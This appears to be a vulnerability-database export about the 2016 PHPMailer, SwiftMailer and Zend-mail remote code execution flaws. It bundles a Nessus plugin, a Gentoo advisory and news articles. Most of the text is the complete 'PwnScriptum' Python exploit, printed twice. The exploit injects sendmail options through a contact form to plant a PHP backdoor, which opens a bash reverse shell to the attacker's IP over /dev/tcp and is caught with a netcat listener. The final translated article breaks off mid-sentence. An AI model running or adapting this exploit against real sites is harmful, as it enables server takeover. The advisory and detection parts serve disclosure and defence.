POST_NAME]\r\n [--post-email POST_EMAIL]\r\n [--post-msg POST_MSG]\r\n\r\nNote, make sure the contact form matches the default field names (send/name/email/msg). 
\r\nOtherwise override with --post-msg=message_box for example.\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport argparse\r\nimport time\r\nimport urllib\r\nimport urllib2\r\nimport socket\r\nimport sys\r\n\r\n\r\n# The Main Meat\r\nprint intro\r\n\r\n# Show info\r\nif '-H' in sys.argv:\r\n\tprint info\r\n\texit(0)\r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \\'PwnScriptum\\')\\nDiscovered by Dawid Golunski (https://legalhackers.com)')\r\nparser.add_argument('-H', action='store_true', default=\"false\", required=False, help='Full Help / Info Page')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-d' , dest='TARGET_UP_DIR', required=False, help='Target Upload Dir')\r\nparser.add_argument('-ip', dest='ATTACKERS_IP', required=True, help='Attackers Public IP for RevShell')\r\nparser.add_argument('-p', dest='ATTACKERS_PORT', required=False, help='Attackers Port for RevShell listener')\r\nparser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition')\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n\r\n# Preset vars\r\nTMOUT = 3\r\n# Set Vars\r\nif args.ATTACKERS_PORT is None:\r\n\targs.ATTACKERS_PORT = 8080\r\nif args.TARGET_UP_DIR is 
None:\r\n\targs.TARGET_UP_DIR = \"upload\"\r\n# Build the target backdoor URL here (note the \"random\" pid bit to avoid php code collisions on multiple runs / multiple phpfile appends ;)\r\nBACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php'\r\nBACKDOOR_URL = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE\r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n\r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nTARGET_UP_DIR = [%s]\r\nATTACKERS_IP = [%s]\r\nATTACKERS_PORT = [%s]\r\nCONTACT_SCRIPT_URL = [%s]\r\nBACKDOOR_FILEl = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE)\r\n\r\n\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045)\r\n\t The escapeshellarg() bypass :)\\n\"\"\"\r\nprint \"\"\"[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\\n\"\"\"\r\nprint \"\"\"[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\\033[0m\"\r\n\r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\nif (target>4):\r\n print \"No such target. 
Exiting\\n\"\r\n exit(3)\r\nif target == 1:\r\n\t# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)\r\n\tpayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s some\"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 2:\r\n\t# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)\r\n\tpayload = \"\\\"attacker\\\\' -oQ/tmp/ -X%s/%s some\\\"@email.com\" % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 3:\r\n\t# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n payload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\nif target == 4:\r\n\t# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n payload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)\r\n\r\nprint \"\\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\\n\" % args.TARGET_UP_DIR\r\n# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g:\r\n# e.g: \r\n#RCE_PHP_CODE = \"<?php phpinfo(); ?>\" \r\nRCE_PHP_CODE = \"\"\"<?php sleep(%d); system(\"/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1' \"); ?>\"\"\" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) \r\n\r\n# The form names might need to be adjusted\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: RCE_PHP_CODE}\r\n\r\n# Attack\r\n# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor\r\nprint \"[+] Backdoor upload via the contact form at '%s'\\n\" % CONTACT_SCRIPT_URL\r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nresponse = urllib2.urlopen(req)\r\nthe_page = response.read()\r\n\r\n\r\n# Check if the backdoor was uploaded correctly.\r\n# A little trick here. 
The urlopen should timeout at sleep(X)-1 if the backdoor ran fine\r\n# So we catch the timeout to find out.\r\n\r\n# Is it uploaded ? Try to execute the PHP backdoor and the Reverse Shell within it\r\nprint \"[+] Checking for the backdoor at the URL '%s'\\n\" % BACKDOOR_URL\r\ngot_timeout = 0\r\nhttp_err = 0\r\ntry:\r\n urllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1))\r\nexcept urllib2.HTTPError as e:\r\n http_err = e.code\r\nexcept socket.timeout as e:\r\n print \"[*] \\033[1;32mLooking good!\\033[0m The sleep() worked by the looks of it :) \\nUrlopen timed out just in time for the shell :)\\n\"\r\n got_timeout = 1\r\n\r\nif (got_timeout != 1):\r\n print \"[!] Something went wrong... Got error: [%d] \\nTry another dir? Push through, don't give up! :)\\n\" % http_err\r\n exit(2)\r\n\r\n# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called\r\nprint \"[+] We should get a shell if we got till here! Spawning netcat now! :)\\n\"\r\nprint \"[+] \\033[1;34mPlease tell me you're seeing this too... ;)\\033[0m\\n\"\r\nos.system(\"nc -v -l -p %d\" % args.ATTACKERS_PORT)\r\n\r\nprint \"\\n[+] Shell closed\\n\"\r\n\r\nprint \"\\033[1;34mP.$. There's more to it :) Exiting, for now...\\033[0m\\n\"\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40986/"}], "nessus": [{"lastseen": "2019-11-01T02:41:46", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201804-10\n(Zend Framework: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zend Framework that\n have remain unaddressed. 
Please review the referenced CVE identifiers for\n details.\n \nImpact :\n\n Remote attackers could execute arbitrary commands or conduct SQL\n injection attacks.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201804-10.NASL", "href": "https://www.tenable.com/plugins/nessus/108931", "published": "2018-04-10T00:00:00", "title": "GLSA-201804-10 : Zend Framework: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201804-10.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108931);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2016-10034\", \"CVE-2016-4861\", \"CVE-2016-6233\");\n script_xref(name:\"GLSA\", value:\"201804-10\");\n\n script_name(english:\"GLSA-201804-10 : Zend Framework: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201804-10\n(Zend Framework: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zend Framework that\n have remain unaddressed. 
Please review the referenced CVE identifiers for\n details.\n \nImpact :\n\n Remote attackers could execute arbitrary commands or conduct SQL\n injection attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201804-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo has discontinued support for Zend Framework and recommends that\n users unmerge the package:\n # emerge --unmerge 'dev-php/ZendFramework'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ZendFramework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/ZendFramework\", unaffected:make_list(), vulnerable:make_list(\"le 1.12.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Zend Framework\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-04-09T19:08:30", "bulletinFamily": "unix", "description": "### Background\n\nZend Framework is a high quality and open source framework for developing Web Applications. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Zend Framework that have remain unaddressed. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nRemote attackers could execute arbitrary commands or conduct SQL injection attacks. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo has discontinued support for Zend Framework and recommends that users unmerge the package: \n \n \n # emerge --unmerge \"dev-php/ZendFramework\"", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "href": "https://security.gentoo.org/glsa/201804-10", "id": "GLSA-201804-10", "type": "gentoo", "title": "Zend Framework: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:17", "bulletinFamily": "info", "description": "Critical remote code execution vulnerabilities in two different libraries used to send emails via PHP were patched this week.\n\n[An issue in PHPMailer](<https://threatpost.com/phpmailer-bug-leaves-millions-of-websites-open-to-attack/122775/>), thought fixed, was resolved with an update, version 5.2.21, pushed late Wednesday. Developers with another mailing library for PHP, SwiftMailer, remedied a similar issue that could have also led to remote code execution on Thursday.\n\n> [#Swiftmailer](<https://twitter.com/hashtag/Swiftmailer?src=hash>) 5.4.5 fixes CVE-2016-10074. Thanks [@barryvdh](<https://twitter.com/barryvdh>) and [@Zenexer](<https://twitter.com/Zenexer>) for the help. 
And to [@dawid_golunski](<https://twitter.com/dawid_golunski>) for finding the issue\n> \n> \u2014 Fabien Potencier (@fabpot) [December 29, 2016](<https://twitter.com/fabpot/status/814416314429308928>)\n\nBoth bugs were disclosed this week by researcher [Dawid Golunski](<https://twitter.com/dawid_golunski>) of [Legal Hackers](<https://legalhackers.com/>).\n\nAn attacker could have exploited the PHPMailer vulnerability ([CVE-2016-10033](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html>)) by targeting website components that use PHPMailer, like contact/registration forms, password email reset forms, and so forth. In addition to giving a remote attacker the ability to execute arbitrary code, the vulnerability also could have given attackers access to a web server hosting a web app that used a vulnerable version of the library. To get the word out, a website for the vulnerability, nicknamed [PwnScriptum](<http://pwnscriptum.com/>), and a logo, began making the rounds earlier this week.\n\nIt was learned early Wednesday an update PHPMailer pushed to fix the original issue over the weekend, version 5.2.18, could be bypassed. That bypass was given a new CVE ([CVE-2016-10045](<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html>)) something that put the original issue back at \u2018square one,\u2019 according to the researcher.\n\n\u201cThere is no public patch at the moment. All PHPMailer versions are vulnerable again. 
Back to square one,\u201d Golunski told Threatpost Wednesday.\n\n> [ [#RCE](<https://twitter.com/hashtag/RCE?src=hash>) [#0day](<https://twitter.com/hashtag/0day?src=hash>) [#vuln](<https://twitter.com/hashtag/vuln?src=hash>)] SwiftMailer Remains Unpatched.Adding to the [#PwnScriptum](<https://twitter.com/hashtag/PwnScriptum?src=hash>) [#phpmailer](<https://twitter.com/hashtag/phpmailer?src=hash>) family \ud83d\ude09 <https://t.co/bg8ByA6eSr> [#infosec](<https://twitter.com/hashtag/infosec?src=hash>) [#security](<https://twitter.com/hashtag/security?src=hash>)\n> \n> \u2014 Dawid Golunski (@dawid_golunski) [December 28, 2016](<https://twitter.com/dawid_golunski/status/814176750662021120>)\n\n[PHPMailer](<https://github.com/PHPMailer/PHPMailer>) eventually fixed the bypass issue with an update, version 5.2.20, later that day.\n\nThe [SwiftMailer](<https://github.com/swiftmailer/swiftmailer>) vulnerability ([CVE-2016-10074](<https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html>)) could have been exploited through the same means as the PHPMailer vulnerability: contact/registration forms, password email reset forms, and any other components that use the SwiftMailer class. Before a fix was applied, the vulnerability affected all versions of the library, including the then-current release, 5.4.5-DEV.\n\nCiting weeks of inactivity by the vendor, Golunski disclosed the vulnerability on Wednesday. 
Once disclosed, SwiftMailer acted fast to fix the vulnerability, pushing version 5.4.5 on Thursday.\n\nAccording to the changelog for [SwiftMailer](<https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGES>) on GitHub, developers fixed the issue by deprecating the mail transport used by the library, Swift_Transport_MailTransport, as it was vulnerable to passing arbitrary shell arguments.\n\nGolunski published a similar [proof of concept exploit](<https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html>) for another PHP framework, Zend Framework, on December 30. Zend, the company responsible for the framework, [patched the vulnerability](<https://framework.zend.com/security/advisory/ZF2016-04>) in zend-mail, starting in version 2.7.2, zend-mail, 2.4.11, and Zend Framework, 2.4.11, on December 20. Golunski claims he will publish a more robust disclosure, in which he will discuss other vectors and exploits, in a future whitepaper.\n\nGolunski has had a busy end to 2016. In addition to the PHPMailer and SwiftMailer vulnerabilities, he uncovered two critical vulnerabilities in the open source IT infrastructure monitoring software Nagios Core [earlier this month](<https://threatpost.com/nagios-core-patches-root-rce-vulnerabilities/122558/>). 
If exploited those vulnerabilities could have been used to elevate privileges to root and gain remote code execution.\n\n_This article was updated on January 3 to include information regarding a similar vulnerability in Zend Framework._\n", "modified": "2017-01-06T15:20:39", "published": "2016-12-29T14:20:38", "id": "THREATPOST:6FB38D322999A6FDD13C28B8C35B0C8F", "href": "https://threatpost.com/phpmailer-swiftmailer-updates-resolve-critical-remote-code-execution-vulnerabilities/122795/", "type": "threatpost", "title": "PHPMailer, SwiftMailer Updates Resolve Critical Remote Code Execution Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-01-04T02:03:27", "bulletinFamily": "exploit", "description": "", "modified": "2017-01-03T00:00:00", "published": "2017-01-03T00:00:00", "href": "https://packetstormsecurity.com/files/140349/PHPMailer-Zend-mail-SwiftMailer-Remote-Code-Execution.html", "id": "PACKETSTORM:140349", "type": "packetstorm", "title": "PHPMailer / Zend-mail / SwiftMailer Remote Code Execution", "sourceData": "`#!/usr/bin/python \n \nintro = \"\"\"\\033[94m \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \n \nPHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit \na.k.a \"PwnScriptum\" \n \nCVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074 \n \n \nThis PoC exploit aims to execute a reverse shell on the target in \nthe context of the web-server user via vulnerable PHP email library. \n \n \nDiscovered and Coded by: \n \n\\033[1;34m \nDawid Golunski \nhttps://legalhackers.com \n \nt: @dawid_golunski for updates \n\\033[0m \n\\033[94m \nP.$. For testing only! 
Don't break the Web ;) \n\\033[0m \n\"\"\" \ninfo = \"\"\" \n[Version] \nLimited (ver. 1.0) \n \n[PoC Video] \nSee the the exploit in action at: \n \nhttps://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html \n \n[Info] \nThis exploit targets a common webapp component - Contact Form. \n \nIt combines payloads for the following vulns: \n \n1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \n \n2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass) \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html \n \n3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n4. Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) \nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html \n \n[Usage] \n \n./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT \n[-d TARGET_UP_DIR] -ip ATTACKERS_IP \n[-p ATTACKERS_PORT] [--version] \n[--post-action POST_ACTION] \n[--post-name POST_NAME] \n[--post-email POST_EMAIL] \n[--post-msg POST_MSG] \n \nNote, make sure the contact form matches the default field names (send/name/email/msg). \nOtherwise override with --post-msg=message_box for example. 
\n \n\"\"\" \n \nimport os \nimport argparse \nimport time \nimport urllib \nimport urllib2 \nimport socket \nimport sys \n \n \n# The Main Meat \nprint intro \n \n# Show info \nif '-H' in sys.argv: \nprint info \nexit(0) \n# Parse input args \nparser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \\'PwnScriptum\\')\\nDiscovered by Dawid Golunski (https://legalhackers.com)') \nparser.add_argument('-H', action='store_true', default=\"false\", required=False, help='Full Help / Info Page') \nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url') \nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname') \nparser.add_argument('-d' , dest='TARGET_UP_DIR', required=False, help='Target Upload Dir') \nparser.add_argument('-ip', dest='ATTACKERS_IP', required=True, help='Attackers Public IP for RevShell') \nparser.add_argument('-p', dest='ATTACKERS_PORT', required=False, help='Attackers Port for RevShell listener') \nparser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition') \nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\") \nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\") \nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\") \nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\") \nargs = parser.parse_args() \n \n# Preset vars \nTMOUT = 3 \n# Set Vars \nif args.ATTACKERS_PORT is None: \nargs.ATTACKERS_PORT = 8080 \nif args.TARGET_UP_DIR is None: \nargs.TARGET_UP_DIR = \"upload\" \n# Build the target backdoor URL here (note the \"random\" pid bit to avoid 
php code collisions on multiple runs / multiple phpfile appends ;) \nBACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php' \nBACKDOOR_URL = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE \nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT \n \n# Show params \nprint \"\"\"[+] Setting vars to: \\n \nWEBAPP_BASE_URL = [%s] \nCONTACT_SCRIPT = [%s] \nTARGET_UP_DIR = [%s] \nATTACKERS_IP = [%s] \nATTACKERS_PORT = [%s] \nCONTACT_SCRIPT_URL = [%s] \nBACKDOOR_FILEl = [%s] \n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE) \n \n \nprint \"[+] Choose your target / payload: \" \nprint \"\\033[1;34m\" \nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\\n\"\"\" \nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) \nThe escapeshellarg() bypass :)\\n\"\"\" \nprint \"\"\"[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\\n\"\"\" \nprint \"\"\"[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\" \nprint \"\\033[0m\" \n \ntry: \ntarget = int(raw_input('[?] Select target [1-2]: ')) \nexcept ValueError: \nprint \"Not a valid choice. Exiting\\n\" \nexit(2) \nif (target>4): \nprint \"No such target. 
Exiting\\n\" \nexit(3) \nif target == 1: \n# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s some\"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 2: \n# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) \npayload = \"\\\"attacker\\\\' -oQ/tmp/ -X%s/%s some\\\"@email.com\" % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 3: \n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \nif target == 4: \n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) \npayload = '\"attacker\\\\\" -oQ/tmp/ -X%s/%s \"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) \n \nprint \"\\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\\n\" % args.TARGET_UP_DIR \n# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g: \n# e.g: \n#RCE_PHP_CODE = \"<?php phpinfo(); ?>\" \nRCE_PHP_CODE = \"\"\"<?php sleep(%d); system(\"/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1' \"); ?>\"\"\" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) \n \n# The form names might need to be adjusted \npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: RCE_PHP_CODE} \n \n# Attack \n# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor \nprint \"[+] Backdoor upload via the contact form at '%s'\\n\" % CONTACT_SCRIPT_URL \ndata = urllib.urlencode(post_fields) \nreq = urllib2.Request(CONTACT_SCRIPT_URL, data) \nresponse = urllib2.urlopen(req) \nthe_page = response.read() \n \n \n# Check if the backdoor was uploaded correctly. \n# A little trick here. The urlopen should timeout at sleep(X)-1 if the backdoor ran fine \n# So we catch the timeout to find out. 
\n \n# Is it uploaded ? Try to execute the PHP backdoor and the Reverse Shell within it \nprint \"[+] Checking for the backdoor at the URL '%s'\\n\" % BACKDOOR_URL \ngot_timeout = 0 \nhttp_err = 0 \ntry: \nurllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1)) \nexcept urllib2.HTTPError as e: \nhttp_err = e.code \nexcept socket.timeout as e: \nprint \"[*] \\033[1;32mLooking good!\\033[0m The sleep() worked by the looks of it :) \\nUrlopen timed out just in time for the shell :)\\n\" \ngot_timeout = 1 \n \nif (got_timeout != 1): \nprint \"[!] Something went wrong... Got error: [%d] \\nTry another dir? Push through, don't give up! :)\\n\" % http_err \nexit(2) \n \n# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called \nprint \"[+] We should get a shell if we got till here! Spawning netcat now! :)\\n\" \nprint \"[+] \\033[1;34mPlease tell me you're seeing this too... ;)\\033[0m\\n\" \nos.system(\"nc -v -l -p %d\" % args.ATTACKERS_PORT) \n \nprint \"\\n[+] Shell closed\\n\" \n \nprint \"\\033[1;34mP.$. There's more to it :) Exiting, for now...\\033[0m\\n\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140349/pwnscriptum-exec.txt"}], "myhack58": [{"lastseen": "2017-01-05T15:01:01", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2017-1/20171543510834. png? www. myhack58. com) \nResearchers recently found a present in 3 common open source PHP Library for high-risk(Critical)vulnerabilities, hackers can exploit this vulnerability to remotely execute arbitrary commands, there is a vulnerability in the PHP library includes SwiftMailer And PhpMailer and ZendMail it. \nA few days ago FreeBuf reported from Poland Legal Hackers, a researcher Dawid Golunski before a burst will disclose the presence in the PHPMailer Vulnerability(CVE-2016-10033), the exploit program on the parameters of the filtering is imperfect, to execute arbitrary code. 
PHPMailer in the world with users is about 900 million. So, PHPMailer for that vulnerability was released 5. 2. 18 edition, which uses the escapeshellarg()function to filter, seems to fix the vulnerability, but in fact a new function with the escapeshellcmd()there is a conflict. \nThe use of the new version of the conflict, the researchers Golunski again bypassing the 5. 2. 18 version of PHPMailer in security measures, and therefore the application of a new vulnerability ID(CVE-2016-10045)\u3002 This is a vulnerability affecting a wider range, including many open source web applications such as WordPress, Drupal, 1CRM, SugarCRM, Yii and Joomla are could be subject to attack. \nIn the end, PHPMailer released 5. 2. 20 version, all previous versions are affected, please webmasters as soon as possible to upgrade to the latest version. \nIn addition, Golunski also found two other PHP libraries in similar vulnerability, which two PHP library is SwiftMailer and ZendMail it. The above three vulnerability risk level to reach the 